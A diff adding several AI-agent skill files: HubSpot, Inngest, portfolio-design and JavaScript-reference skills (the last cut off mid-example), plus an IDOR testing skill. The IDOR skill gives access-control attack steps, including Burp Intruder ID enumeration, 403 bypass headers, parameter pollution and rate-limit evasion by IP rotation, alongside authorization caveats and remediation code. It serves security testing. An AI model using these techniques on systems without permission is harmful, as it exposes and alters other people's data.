skills/hubspot-integration/SKILL.md
Normal file
42
skills/hubspot-integration/SKILL.md
Normal file
@@ -0,0 +1,42 @@
|
||||
---
|
||||
name: hubspot-integration
|
||||
description: "Expert patterns for HubSpot CRM integration including OAuth authentication, CRM objects, associations, batch operations, webhooks, and custom objects. Covers Node.js and Python SDKs. Use when: hubspot, hubspot api, hubspot crm, hubspot integration, contacts api."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# HubSpot Integration
|
||||
|
||||
## Patterns
|
||||
|
||||
### OAuth 2.0 Authentication
|
||||
|
||||
Secure authentication for public apps
|
||||
|
||||
### Private App Token
|
||||
|
||||
Authentication for single-account integrations
|
||||
|
||||
### CRM Object CRUD Operations
|
||||
|
||||
Create, read, update, delete CRM records
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Using Deprecated API Keys
|
||||
|
||||
### ❌ Individual Requests Instead of Batch
|
||||
|
||||
### ❌ Polling Instead of Webhooks
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | high | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | critical | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | critical | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | medium | See docs |
|
||||
439
skills/idor-testing/SKILL.md
Normal file
439
skills/idor-testing/SKILL.md
Normal file
@@ -0,0 +1,439 @@
|
||||
---
|
||||
name: IDOR Vulnerability Testing
|
||||
description: This skill should be used when the user asks to "test for insecure direct object references," "find IDOR vulnerabilities," "exploit broken access control," "enumerate user IDs or object references," or "bypass authorization to access other users' data." It provides comprehensive guidance for detecting, exploiting, and remediating IDOR vulnerabilities in web applications.
|
||||
---
|
||||
|
||||
# IDOR Vulnerability Testing
|
||||
|
||||
## Purpose
|
||||
|
||||
Provide systematic methodologies for identifying and exploiting Insecure Direct Object Reference (IDOR) vulnerabilities in web applications. This skill covers both database object references and static file references, detection techniques using parameter manipulation and enumeration, exploitation via Burp Suite, and remediation strategies for securing applications against unauthorized access.
|
||||
|
||||
## Inputs / Prerequisites
|
||||
|
||||
- **Target Web Application**: URL of application with user-specific resources
|
||||
- **Multiple User Accounts**: At least two test accounts to verify cross-user access
|
||||
- **Burp Suite or Proxy Tool**: Intercepting proxy for request manipulation
|
||||
- **Authorization**: Written permission for security testing
|
||||
- **Understanding of Application Flow**: Knowledge of how objects are referenced (IDs, filenames)
|
||||
|
||||
## Outputs / Deliverables
|
||||
|
||||
- **IDOR Vulnerability Report**: Documentation of discovered access control bypasses
|
||||
- **Proof of Concept**: Evidence of unauthorized data access across user contexts
|
||||
- **Affected Endpoints**: List of vulnerable API endpoints and parameters
|
||||
- **Impact Assessment**: Classification of data exposure severity
|
||||
- **Remediation Recommendations**: Specific fixes for identified vulnerabilities
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### 1. Understand IDOR Vulnerability Types
|
||||
|
||||
#### Direct Reference to Database Objects
|
||||
Occurs when applications reference database records via user-controllable parameters:
|
||||
```
|
||||
# Original URL (authenticated as User A)
|
||||
example.com/user/profile?id=2023
|
||||
|
||||
# Manipulation attempt (accessing User B's data)
|
||||
example.com/user/profile?id=2022
|
||||
```
|
||||
|
||||
#### Direct Reference to Static Files
|
||||
Occurs when applications expose file paths or names that can be enumerated:
|
||||
```
|
||||
# Original URL (User A's receipt)
|
||||
example.com/static/receipt/205.pdf
|
||||
|
||||
# Manipulation attempt (User B's receipt)
|
||||
example.com/static/receipt/200.pdf
|
||||
```
|
||||
|
||||
### 2. Reconnaissance and Setup
|
||||
|
||||
#### Create Multiple Test Accounts
|
||||
```
|
||||
Account 1: "attacker" - Primary testing account
|
||||
Account 2: "victim" - Account whose data we attempt to access
|
||||
```
|
||||
|
||||
#### Identify Object References
|
||||
Capture and analyze requests containing:
|
||||
- Numeric IDs in URLs: `/api/user/123`
|
||||
- Numeric IDs in parameters: `?id=123&action=view`
|
||||
- Numeric IDs in request body: `{"userId": 123}`
|
||||
- File paths: `/download/receipt_123.pdf`
|
||||
- GUIDs/UUIDs: `/profile/a1b2c3d4-e5f6-...`
|
||||
|
||||
#### Map User IDs
|
||||
```
|
||||
# Access user ID endpoint (if available)
|
||||
GET /api/user-id/
|
||||
|
||||
# Note ID patterns:
|
||||
# - Sequential integers (1, 2, 3...)
|
||||
# - Auto-incremented values
|
||||
# - Predictable patterns
|
||||
```
|
||||
|
||||
### 3. Detection Techniques
|
||||
|
||||
#### URL Parameter Manipulation
|
||||
```
|
||||
# Step 1: Capture original authenticated request
|
||||
GET /api/user/profile?id=1001 HTTP/1.1
|
||||
Cookie: session=attacker_session
|
||||
|
||||
# Step 2: Modify ID to target another user
|
||||
GET /api/user/profile?id=1000 HTTP/1.1
|
||||
Cookie: session=attacker_session
|
||||
|
||||
# Vulnerable if: Returns victim's data with attacker's session
|
||||
```
|
||||
|
||||
#### Request Body Manipulation
|
||||
```
|
||||
# Original POST request
|
||||
POST /api/address/update HTTP/1.1
|
||||
Content-Type: application/json
|
||||
Cookie: session=attacker_session
|
||||
|
||||
{"id": 5, "userId": 1001, "address": "123 Attacker St"}
|
||||
|
||||
# Modified request targeting victim
|
||||
{"id": 5, "userId": 1000, "address": "123 Attacker St"}
|
||||
```
|
||||
|
||||
#### HTTP Method Switching
|
||||
```
|
||||
# Original GET request may be protected
|
||||
GET /api/admin/users/1000 → 403 Forbidden
|
||||
|
||||
# Try alternative methods
|
||||
POST /api/admin/users/1000 → 200 OK (Vulnerable!)
|
||||
PUT /api/admin/users/1000 → 200 OK (Vulnerable!)
|
||||
```
|
||||
|
||||
### 4. Exploitation with Burp Suite
|
||||
|
||||
#### Manual Exploitation
|
||||
```
|
||||
1. Configure browser proxy through Burp Suite
|
||||
2. Login as "attacker" user
|
||||
3. Navigate to profile/data page
|
||||
4. Enable Intercept in Proxy tab
|
||||
5. Capture request with user ID
|
||||
6. Modify ID to victim's ID
|
||||
7. Forward request
|
||||
8. Observe response for victim's data
|
||||
```
|
||||
|
||||
#### Automated Enumeration with Intruder
|
||||
```
|
||||
1. Send request to Intruder (Ctrl+I)
|
||||
2. Clear all payload positions
|
||||
3. Select ID parameter as payload position
|
||||
4. Configure attack type: Sniper
|
||||
5. Payload settings:
|
||||
- Type: Numbers
|
||||
- Range: 1 to 10000
|
||||
- Step: 1
|
||||
6. Start attack
|
||||
7. Analyze responses for 200 status codes
|
||||
```
|
||||
|
||||
#### Battering Ram Attack for Multiple Positions
|
||||
```
|
||||
# When same ID appears in multiple locations
|
||||
PUT /api/addresses/§5§/update HTTP/1.1
|
||||
|
||||
{"id": §5§, "userId": 3}
|
||||
|
||||
Attack Type: Battering Ram
|
||||
Payload: Numbers 1-1000
|
||||
```
|
||||
|
||||
### 5. Common IDOR Locations
|
||||
|
||||
#### API Endpoints
|
||||
```
|
||||
/api/user/{id}
|
||||
/api/profile/{id}
|
||||
/api/order/{id}
|
||||
/api/invoice/{id}
|
||||
/api/document/{id}
|
||||
/api/message/{id}
|
||||
/api/address/{id}/update
|
||||
/api/address/{id}/delete
|
||||
```
|
||||
|
||||
#### File Downloads
|
||||
```
|
||||
/download/invoice_{id}.pdf
|
||||
/static/receipts/{id}.pdf
|
||||
/uploads/documents/{filename}
|
||||
/files/reports/report_{date}_{id}.xlsx
|
||||
```
|
||||
|
||||
#### Query Parameters
|
||||
```
|
||||
?userId=123
|
||||
?orderId=456
|
||||
?documentId=789
|
||||
?file=report_123.pdf
|
||||
?account=user@email.com
|
||||
```
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### IDOR Testing Checklist
|
||||
|
||||
| Test | Method | Indicator of Vulnerability |
|
||||
|------|--------|---------------------------|
|
||||
| Increment/Decrement ID | Change `id=5` to `id=4` | Returns different user's data |
|
||||
| Use Victim's ID | Replace with known victim ID | Access granted to victim's resources |
|
||||
| Enumerate Range | Test IDs 1-1000 | Find valid records of other users |
|
||||
| Negative Values | Test `id=-1` or `id=0` | Unexpected data or errors |
|
||||
| Large Values | Test `id=99999999` | System information disclosure |
|
||||
| String IDs | Change format `id=user_123` | Logic bypass |
|
||||
| GUID Manipulation | Modify UUID portions | Predictable UUID patterns |
|
||||
|
||||
### Response Analysis
|
||||
|
||||
| Status Code | Interpretation |
|
||||
|-------------|----------------|
|
||||
| 200 OK | Potential IDOR - verify data ownership |
|
||||
| 403 Forbidden | Access control working |
|
||||
| 404 Not Found | Resource doesn't exist |
|
||||
| 401 Unauthorized | Authentication required |
|
||||
| 500 Error | Potential input validation issue |
|
||||
|
||||
### Common Vulnerable Parameters
|
||||
|
||||
| Parameter Type | Examples |
|
||||
|----------------|----------|
|
||||
| User identifiers | `userId`, `uid`, `user_id`, `account` |
|
||||
| Resource identifiers | `id`, `pid`, `docId`, `fileId` |
|
||||
| Order/Transaction | `orderId`, `transactionId`, `invoiceId` |
|
||||
| Message/Communication | `messageId`, `threadId`, `chatId` |
|
||||
| File references | `filename`, `file`, `document`, `path` |
|
||||
|
||||
## Constraints and Limitations
|
||||
|
||||
### Operational Boundaries
|
||||
- Requires at least two valid user accounts for verification
|
||||
- Some applications use session-bound tokens instead of IDs
|
||||
- GUID/UUID references harder to enumerate but not impossible
|
||||
- Rate limiting may restrict enumeration attempts
|
||||
- Some IDOR requires chained vulnerabilities to exploit
|
||||
|
||||
### Detection Challenges
|
||||
- Horizontal privilege escalation (user-to-user) vs vertical (user-to-admin)
|
||||
- Blind IDOR where response doesn't confirm access
|
||||
- Time-based IDOR in asynchronous operations
|
||||
- IDOR in websocket communications
|
||||
|
||||
### Legal Requirements
|
||||
- Only test applications with explicit authorization
|
||||
- Document all testing activities and findings
|
||||
- Do not access, modify, or exfiltrate real user data
|
||||
- Report findings through proper disclosure channels
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Basic ID Parameter IDOR
|
||||
```
|
||||
# Login as attacker (userId=1001)
|
||||
# Navigate to profile page
|
||||
|
||||
# Original request
|
||||
GET /api/profile?id=1001 HTTP/1.1
|
||||
Cookie: session=abc123
|
||||
|
||||
# Response: Attacker's profile data
|
||||
|
||||
# Modified request (targeting victim userId=1000)
|
||||
GET /api/profile?id=1000 HTTP/1.1
|
||||
Cookie: session=abc123
|
||||
|
||||
# Vulnerable Response: Victim's profile data returned!
|
||||
```
|
||||
|
||||
### Example 2: IDOR in Address Update Endpoint
|
||||
```
|
||||
# Intercept address update request
|
||||
PUT /api/addresses/5/update HTTP/1.1
|
||||
Content-Type: application/json
|
||||
Cookie: session=attacker_session
|
||||
|
||||
{
|
||||
"id": 5,
|
||||
"userId": 1001,
|
||||
"street": "123 Main St",
|
||||
"city": "Test City"
|
||||
}
|
||||
|
||||
# Modify userId to victim's ID
|
||||
{
|
||||
"id": 5,
|
||||
"userId": 1000, # Changed from 1001
|
||||
"street": "Hacked Address",
|
||||
"city": "Exploit City"
|
||||
}
|
||||
|
||||
# If 200 OK: Address created under victim's account
|
||||
```
|
||||
|
||||
### Example 3: Static File IDOR
|
||||
```
|
||||
# Download own receipt
|
||||
GET /api/download/5 HTTP/1.1
|
||||
Cookie: session=attacker_session
|
||||
|
||||
# Response: PDF of attacker's receipt (order #5)
|
||||
|
||||
# Attempt to access other receipts
|
||||
GET /api/download/3 HTTP/1.1
|
||||
Cookie: session=attacker_session
|
||||
|
||||
# Vulnerable Response: PDF of victim's receipt (order #3)!
|
||||
```
|
||||
|
||||
### Example 4: Burp Intruder Enumeration
|
||||
```
|
||||
# Configure Intruder attack
|
||||
Target: PUT /api/addresses/§1§/update
|
||||
Payload Position: Address ID in URL and body
|
||||
|
||||
Attack Configuration:
|
||||
- Type: Battering Ram
|
||||
- Payload: Numbers 0-20, Step 1
|
||||
|
||||
Body Template:
|
||||
{
|
||||
"id": §1§,
|
||||
"userId": 3
|
||||
}
|
||||
|
||||
# Analyze results:
|
||||
# - 200 responses indicate successful modification
|
||||
# - Check victim's account for new addresses
|
||||
```
|
||||
|
||||
### Example 5: Horizontal to Vertical Escalation
|
||||
```
|
||||
# Step 1: Enumerate user roles
|
||||
GET /api/user/1 → {"role": "user", "id": 1}
|
||||
GET /api/user/2 → {"role": "user", "id": 2}
|
||||
GET /api/user/3 → {"role": "admin", "id": 3}
|
||||
|
||||
# Step 2: Access admin functions with discovered ID
|
||||
GET /api/admin/dashboard?userId=3 HTTP/1.1
|
||||
Cookie: session=regular_user_session
|
||||
|
||||
# If accessible: Vertical privilege escalation achieved
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Issue: All Requests Return 403 Forbidden
|
||||
**Cause**: Server-side access control is implemented
|
||||
**Solution**:
|
||||
```
|
||||
# Try alternative attack vectors:
|
||||
1. HTTP method switching (GET → POST → PUT)
|
||||
2. Add X-Original-URL or X-Rewrite-URL headers
|
||||
3. Try parameter pollution: ?id=1001&id=1000
|
||||
4. URL encoding variations: %31%30%30%30 for "1000"
|
||||
5. Case variations for string IDs
|
||||
```
|
||||
|
||||
### Issue: Application Uses UUIDs Instead of Sequential IDs
|
||||
**Cause**: Randomized identifiers reduce enumeration risk
|
||||
**Solution**:
|
||||
```
|
||||
# UUID discovery techniques:
|
||||
1. Check response bodies for leaked UUIDs
|
||||
2. Search JavaScript files for hardcoded UUIDs
|
||||
3. Check API responses that list multiple objects
|
||||
4. Look for UUID patterns in error messages
|
||||
5. Try UUID v1 (time-based) prediction if applicable
|
||||
```
|
||||
|
||||
### Issue: Session Token Bound to User
|
||||
**Cause**: Application validates session against requested resource
|
||||
**Solution**:
|
||||
```
|
||||
# Advanced bypass attempts:
|
||||
1. Test for IDOR in unauthenticated endpoints
|
||||
2. Check password reset/email verification flows
|
||||
3. Look for IDOR in file upload/download
|
||||
4. Test API versioning: /api/v1/ vs /api/v2/
|
||||
5. Check mobile API endpoints (often less protected)
|
||||
```
|
||||
|
||||
### Issue: Rate Limiting Blocks Enumeration
|
||||
**Cause**: Application implements request throttling
|
||||
**Solution**:
|
||||
```
|
||||
# Bypass techniques:
|
||||
1. Add delays between requests (Burp Intruder throttle)
|
||||
2. Rotate IP addresses (proxy chains)
|
||||
3. Target specific high-value IDs instead of full range
|
||||
4. Use different endpoints for same resources
|
||||
5. Test during off-peak hours
|
||||
```
|
||||
|
||||
### Issue: Cannot Verify IDOR Impact
|
||||
**Cause**: Response doesn't clearly indicate data ownership
|
||||
**Solution**:
|
||||
```
|
||||
# Verification methods:
|
||||
1. Create unique identifiable data in victim account
|
||||
2. Look for PII markers (name, email) in responses
|
||||
3. Compare response lengths between users
|
||||
4. Check for timing differences in responses
|
||||
5. Use secondary indicators (creation dates, metadata)
|
||||
```
|
||||
|
||||
## Remediation Guidance
|
||||
|
||||
### Implement Proper Access Control
|
||||
```python
|
||||
# Django example - validate ownership
|
||||
def update_address(request, address_id):
|
||||
address = Address.objects.get(id=address_id)
|
||||
|
||||
# Verify ownership before allowing update
|
||||
if address.user != request.user:
|
||||
return HttpResponseForbidden("Unauthorized")
|
||||
|
||||
# Proceed with update
|
||||
address.update(request.data)
|
||||
```
|
||||
|
||||
### Use Indirect References
|
||||
```python
|
||||
# Instead of: /api/address/123
|
||||
# Use: /api/address/current-user/billing
|
||||
|
||||
def get_address(request):
|
||||
# Always filter by authenticated user
|
||||
address = Address.objects.filter(user=request.user).first()
|
||||
return address
|
||||
```
|
||||
|
||||
### Server-Side Validation
|
||||
```python
|
||||
# Always validate on server, never trust client input
|
||||
def download_receipt(request, receipt_id):
|
||||
receipt = Receipt.objects.filter(
|
||||
id=receipt_id,
|
||||
user=request.user # Critical: filter by current user
|
||||
).first()
|
||||
|
||||
if not receipt:
|
||||
return HttpResponseNotFound()
|
||||
|
||||
return FileResponse(receipt.file)
|
||||
```
|
||||
55
skills/inngest/SKILL.md
Normal file
55
skills/inngest/SKILL.md
Normal file
@@ -0,0 +1,55 @@
|
||||
---
|
||||
name: inngest
|
||||
description: "Inngest expert for serverless-first background jobs, event-driven workflows, and durable execution without managing queues or workers. Use when: inngest, serverless background job, event-driven workflow, step function, durable execution."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Inngest Integration
|
||||
|
||||
You are an Inngest expert who builds reliable background processing without
|
||||
managing infrastructure. You understand that serverless doesn't mean you can't
|
||||
have durable, long-running workflows - it means you don't manage the workers.
|
||||
|
||||
You've built AI pipelines that take minutes, onboarding flows that span days,
|
||||
and event-driven systems that process millions of events. You know that the
|
||||
magic of Inngest is in its steps - each one a checkpoint that survives failures.
|
||||
|
||||
Your core philosophy:
|
||||
1. Event
|
||||
|
||||
## Capabilities
|
||||
|
||||
- inngest-functions
|
||||
- event-driven-workflows
|
||||
- step-functions
|
||||
- serverless-background-jobs
|
||||
- durable-sleep
|
||||
- fan-out-patterns
|
||||
- concurrency-control
|
||||
- scheduled-functions
|
||||
|
||||
## Patterns
|
||||
|
||||
### Basic Function Setup
|
||||
|
||||
Inngest function with typed events in Next.js
|
||||
|
||||
### Multi-Step Workflow
|
||||
|
||||
Complex workflow with parallel steps and error handling
|
||||
|
||||
### Scheduled/Cron Functions
|
||||
|
||||
Functions that run on a schedule
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Not Using Steps
|
||||
|
||||
### ❌ Huge Event Payloads
|
||||
|
||||
### ❌ Ignoring Concurrency
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `nextjs-app-router`, `vercel-deployment`, `supabase-backend`, `email-systems`, `ai-agents-architect`, `stripe-integration`
|
||||
223
skills/interactive-portfolio/SKILL.md
Normal file
223
skills/interactive-portfolio/SKILL.md
Normal file
@@ -0,0 +1,223 @@
|
||||
---
|
||||
name: interactive-portfolio
|
||||
description: "Expert in building portfolios that actually land jobs and clients - not just showing work, but creating memorable experiences. Covers developer portfolios, designer portfolios, creative portfolios, and portfolios that convert visitors into opportunities. Use when: portfolio, personal website, showcase work, developer portfolio, designer portfolio."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Interactive Portfolio
|
||||
|
||||
**Role**: Portfolio Experience Designer
|
||||
|
||||
You know a portfolio isn't a resume - it's a first impression that needs
|
||||
to convert. You balance creativity with usability. You understand that
|
||||
hiring managers spend 30 seconds on each portfolio. You make those 30
|
||||
seconds count. You help people stand out without being gimmicky.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Portfolio architecture
|
||||
- Project showcase design
|
||||
- Interactive case studies
|
||||
- Personal branding for devs/designers
|
||||
- Contact conversion
|
||||
- Portfolio performance
|
||||
- Work presentation
|
||||
- Testimonial integration
|
||||
|
||||
## Patterns
|
||||
|
||||
### Portfolio Architecture
|
||||
|
||||
Structure that works for portfolios
|
||||
|
||||
**When to use**: When planning portfolio structure
|
||||
|
||||
```javascript
|
||||
## Portfolio Architecture
|
||||
|
||||
### The 30-Second Test
|
||||
In 30 seconds, visitors should know:
|
||||
1. Who you are
|
||||
2. What you do
|
||||
3. Your best work
|
||||
4. How to contact you
|
||||
|
||||
### Essential Sections
|
||||
| Section | Purpose | Priority |
|
||||
|---------|---------|----------|
|
||||
| Hero | Hook + identity | Critical |
|
||||
| Work/Projects | Prove skills | Critical |
|
||||
| About | Personality + story | Important |
|
||||
| Contact | Convert interest | Critical |
|
||||
| Testimonials | Social proof | Nice to have |
|
||||
| Blog/Writing | Thought leadership | Optional |
|
||||
|
||||
### Navigation Patterns
|
||||
```
|
||||
Option 1: Single page scroll
|
||||
- Best for: Designers, creatives
|
||||
- Works well with animations
|
||||
- Mobile friendly
|
||||
|
||||
Option 2: Multi-page
|
||||
- Best for: Lots of projects
|
||||
- Individual case study pages
|
||||
- Better for SEO
|
||||
|
||||
Option 3: Hybrid
|
||||
- Main sections on one page
|
||||
- Detailed case studies separate
|
||||
- Best of both worlds
|
||||
```
|
||||
|
||||
### Hero Section Formula
|
||||
```
|
||||
[Your name]
|
||||
[What you do in one line]
|
||||
[One line that differentiates you]
|
||||
[CTA: View Work / Contact]
|
||||
```
|
||||
```
|
||||
|
||||
### Project Showcase
|
||||
|
||||
How to present work effectively
|
||||
|
||||
**When to use**: When building project sections
|
||||
|
||||
```javascript
|
||||
## Project Showcase
|
||||
|
||||
### Project Card Elements
|
||||
| Element | Purpose |
|
||||
|---------|---------|
|
||||
| Thumbnail | Visual hook |
|
||||
| Title | What it is |
|
||||
| One-liner | What you did |
|
||||
| Tech/tags | Quick scan |
|
||||
| Results | Proof of impact |
|
||||
|
||||
### Case Study Structure
|
||||
```
|
||||
1. Hero image/video
|
||||
2. Project overview (2-3 sentences)
|
||||
3. The challenge
|
||||
4. Your role
|
||||
5. Process highlights
|
||||
6. Key decisions
|
||||
7. Results/impact
|
||||
8. Learnings (optional)
|
||||
9. Links (live, GitHub, etc.)
|
||||
```
|
||||
|
||||
### Showing Impact
|
||||
| Instead of | Write |
|
||||
|------------|-------|
|
||||
| "Built a website" | "Increased conversions 40%" |
|
||||
| "Designed UI" | "Reduced user drop-off 25%" |
|
||||
| "Developed features" | "Shipped to 50K users" |
|
||||
|
||||
### Visual Presentation
|
||||
- Device mockups for web/mobile
|
||||
- Before/after comparisons
|
||||
- Process artifacts (wireframes, etc.)
|
||||
- Video walkthroughs for complex work
|
||||
- Hover effects for engagement
|
||||
```
|
||||
|
||||
### Developer Portfolio Specifics
|
||||
|
||||
What works for dev portfolios
|
||||
|
||||
**When to use**: When building developer portfolio
|
||||
|
||||
```javascript
|
||||
## Developer Portfolio
|
||||
|
||||
### What Hiring Managers Look For
|
||||
1. Code quality (GitHub link)
|
||||
2. Real projects (not just tutorials)
|
||||
3. Problem-solving ability
|
||||
4. Communication skills
|
||||
5. Technical depth
|
||||
|
||||
### Must-Haves
|
||||
- GitHub profile link (cleaned up)
|
||||
- Live project links
|
||||
- Tech stack for each project
|
||||
- Your specific contribution (for team projects)
|
||||
|
||||
### Project Selection
|
||||
| Include | Avoid |
|
||||
|---------|-------|
|
||||
| Real problems solved | Tutorial clones |
|
||||
| Side projects with users | Incomplete projects |
|
||||
| Open source contributions | "Coming soon" |
|
||||
| Technical challenges | Basic CRUD apps |
|
||||
|
||||
### Technical Showcase
|
||||
```javascript
|
||||
// Show code snippets that demonstrate:
|
||||
- Clean architecture decisions
|
||||
- Performance optimizations
|
||||
- Clever solutions
|
||||
- Testing approach
|
||||
```
|
||||
|
||||
### Blog/Writing
|
||||
- Technical deep dives
|
||||
- Problem-solving stories
|
||||
- Learning journeys
|
||||
- Shows communication skills
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Template Portfolio
|
||||
|
||||
**Why bad**: Looks like everyone else.
|
||||
No memorable impression.
|
||||
Doesn't show creativity.
|
||||
Easy to forget.
|
||||
|
||||
**Instead**: Add personal touches.
|
||||
Custom design elements.
|
||||
Unique project presentations.
|
||||
Your voice in the copy.
|
||||
|
||||
### ❌ All Style No Substance
|
||||
|
||||
**Why bad**: Fancy animations, weak projects.
|
||||
Style over substance.
|
||||
Hiring managers see through it.
|
||||
No proof of skills.
|
||||
|
||||
**Instead**: Projects first, style second.
|
||||
Real work with real impact.
|
||||
Quality over quantity.
|
||||
Depth over breadth.
|
||||
|
||||
### ❌ Resume Website
|
||||
|
||||
**Why bad**: Boring, forgettable.
|
||||
Doesn't use the medium.
|
||||
No personality.
|
||||
Lists instead of stories.
|
||||
|
||||
**Instead**: Show, don't tell.
|
||||
Visual case studies.
|
||||
Interactive elements.
|
||||
Personality throughout.
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Portfolio more complex than your actual work | medium | ## Right-Sizing Your Portfolio |
|
||||
| Portfolio looks great on desktop, broken on mobile | high | ## Mobile-First Portfolio |
|
||||
| Visitors don't know what to do next | medium | ## Portfolio CTAs |
|
||||
| Portfolio shows old or irrelevant work | medium | ## Portfolio Freshness |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `scroll-experience`, `3d-web-experience`, `landing-page-design`, `personal-branding`
|
||||
645
skills/javascript-mastery/SKILL.md
Normal file
645
skills/javascript-mastery/SKILL.md
Normal file
@@ -0,0 +1,645 @@
|
||||
---
|
||||
name: javascript-mastery
|
||||
description: "Comprehensive JavaScript reference covering 33+ essential concepts every developer should know. From fundamentals like primitives and closures to advanced patterns like async/await and functional programming. Use when explaining JS concepts, debugging JavaScript issues, or teaching JavaScript fundamentals."
|
||||
---
|
||||
|
||||
# 🧠 JavaScript Mastery
|
||||
|
||||
> 33+ essential JavaScript concepts every developer should know, inspired by [33-js-concepts](https://github.com/leonardomso/33-js-concepts).
|
||||
|
||||
## When to Use This Skill
|
||||
|
||||
Use this skill when:
|
||||
|
||||
- Explaining JavaScript concepts
|
||||
- Debugging tricky JS behavior
|
||||
- Teaching JavaScript fundamentals
|
||||
- Reviewing code for JS best practices
|
||||
- Understanding language quirks
|
||||
|
||||
---
|
||||
|
||||
## 1. Fundamentals
|
||||
|
||||
### 1.1 Primitive Types
|
||||
|
||||
JavaScript has 7 primitive types:
|
||||
|
||||
```javascript
|
||||
// String
|
||||
const str = "hello";
|
||||
|
||||
// Number (integers and floats)
|
||||
const num = 42;
|
||||
const float = 3.14;
|
||||
|
||||
// BigInt (for large integers)
|
||||
const big = 9007199254740991n;
|
||||
|
||||
// Boolean
|
||||
const bool = true;
|
||||
|
||||
// Undefined
|
||||
let undef; // undefined
|
||||
|
||||
// Null
|
||||
const empty = null;
|
||||
|
||||
// Symbol (unique identifiers)
|
||||
const sym = Symbol("description");
|
||||
```
|
||||
|
||||
**Key points**:
|
||||
|
||||
- Primitives are immutable
|
||||
- Passed by value
|
||||
- `typeof null === "object"` is a historical bug
|
||||
|
||||
### 1.2 Type Coercion
|
||||
|
||||
JavaScript implicitly converts types:
|
||||
|
||||
```javascript
|
||||
// String coercion
|
||||
"5" + 3; // "53" (number → string)
|
||||
"5" - 3; // 2 (string → number)
|
||||
|
||||
// Boolean coercion
|
||||
Boolean(""); // false
|
||||
Boolean("hello"); // true
|
||||
Boolean(0); // false
|
||||
Boolean([]); // true (!)
|
||||
|
||||
// Equality coercion
|
||||
"5" == 5; // true (coerces)
|
||||
"5" === 5; // false (strict)
|
||||
```
|
||||
|
||||
**Falsy values** (8 total):
|
||||
`false`, `0`, `-0`, `0n`, `""`, `null`, `undefined`, `NaN`
|
||||
|
||||
### 1.3 Equality Operators
|
||||
|
||||
```javascript
|
||||
// == (loose equality) - coerces types
|
||||
null == undefined; // true
|
||||
"1" == 1; // true
|
||||
|
||||
// === (strict equality) - no coercion
|
||||
null === undefined; // false
|
||||
"1" === 1; // false
|
||||
|
||||
// Object.is() - handles edge cases
|
||||
Object.is(NaN, NaN); // true (NaN === NaN is false!)
|
||||
Object.is(-0, 0); // false (0 === -0 is true!)
|
||||
```
|
||||
|
||||
**Rule**: Always use `===` unless you have a specific reason not to.
|
||||
|
||||
---
|
||||
|
||||
## 2. Scope & Closures
|
||||
|
||||
### 2.1 Scope Types
|
||||
|
||||
```javascript
|
||||
// Global scope
|
||||
var globalVar = "global";
|
||||
|
||||
function outer() {
|
||||
// Function scope
|
||||
var functionVar = "function";
|
||||
|
||||
if (true) {
|
||||
// Block scope (let/const only)
|
||||
let blockVar = "block";
|
||||
const alsoBlock = "block";
|
||||
var notBlock = "function"; // var ignores blocks!
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 2.2 Closures
|
||||
|
||||
A closure is a function that remembers its lexical scope:
|
||||
|
||||
```javascript
|
||||
function createCounter() {
|
||||
let count = 0; // "closed over" variable
|
||||
|
||||
return {
|
||||
increment() {
|
||||
return ++count;
|
||||
},
|
||||
decrement() {
|
||||
return --count;
|
||||
},
|
||||
getCount() {
|
||||
return count;
|
||||
},
|
||||
};
|
||||
}
|
||||
|
||||
const counter = createCounter();
|
||||
counter.increment(); // 1
|
||||
counter.increment(); // 2
|
||||
counter.getCount(); // 2
|
||||
```
|
||||
|
||||
**Common use cases**:
|
||||
|
||||
- Data privacy (module pattern)
|
||||
- Function factories
|
||||
- Partial application
|
||||
- Memoization
|
||||
|
||||
### 2.3 var vs let vs const
|
||||
|
||||
```javascript
|
||||
// var - function scoped, hoisted, can redeclare
|
||||
var x = 1;
|
||||
var x = 2; // OK
|
||||
|
||||
// let - block scoped, hoisted (TDZ), no redeclare
|
||||
let y = 1;
|
||||
// let y = 2; // Error!
|
||||
|
||||
// const - like let, but can't reassign
|
||||
const z = 1;
|
||||
// z = 2; // Error!
|
||||
|
||||
// BUT: const objects are mutable
|
||||
const obj = { a: 1 };
|
||||
obj.a = 2; // OK
|
||||
obj.b = 3; // OK
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Functions & Execution
|
||||
|
||||
### 3.1 Call Stack
|
||||
|
||||
```javascript
|
||||
function first() {
|
||||
console.log("first start");
|
||||
second();
|
||||
console.log("first end");
|
||||
}
|
||||
|
||||
function second() {
|
||||
console.log("second");
|
||||
}
|
||||
|
||||
first();
|
||||
// Output:
|
||||
// "first start"
|
||||
// "second"
|
||||
// "first end"
|
||||
```
|
||||
|
||||
Stack overflow example:
|
||||
|
||||
```javascript
|
||||
function infinite() {
|
||||
infinite(); // No base case!
|
||||
}
|
||||
infinite(); // RangeError: Maximum call stack size exceeded
|
||||
```
|
||||
|
||||
### 3.2 Hoisting
|
||||
|
||||
```javascript
|
||||
// Variable hoisting
|
||||
console.log(a); // undefined (hoisted, not initialized)
|
||||
var a = 5;
|
||||
|
||||
console.log(b); // ReferenceError (TDZ)
|
||||
let b = 5;
|
||||
|
||||
// Function hoisting
|
||||
sayHi(); // Works!
|
||||
function sayHi() {
|
||||
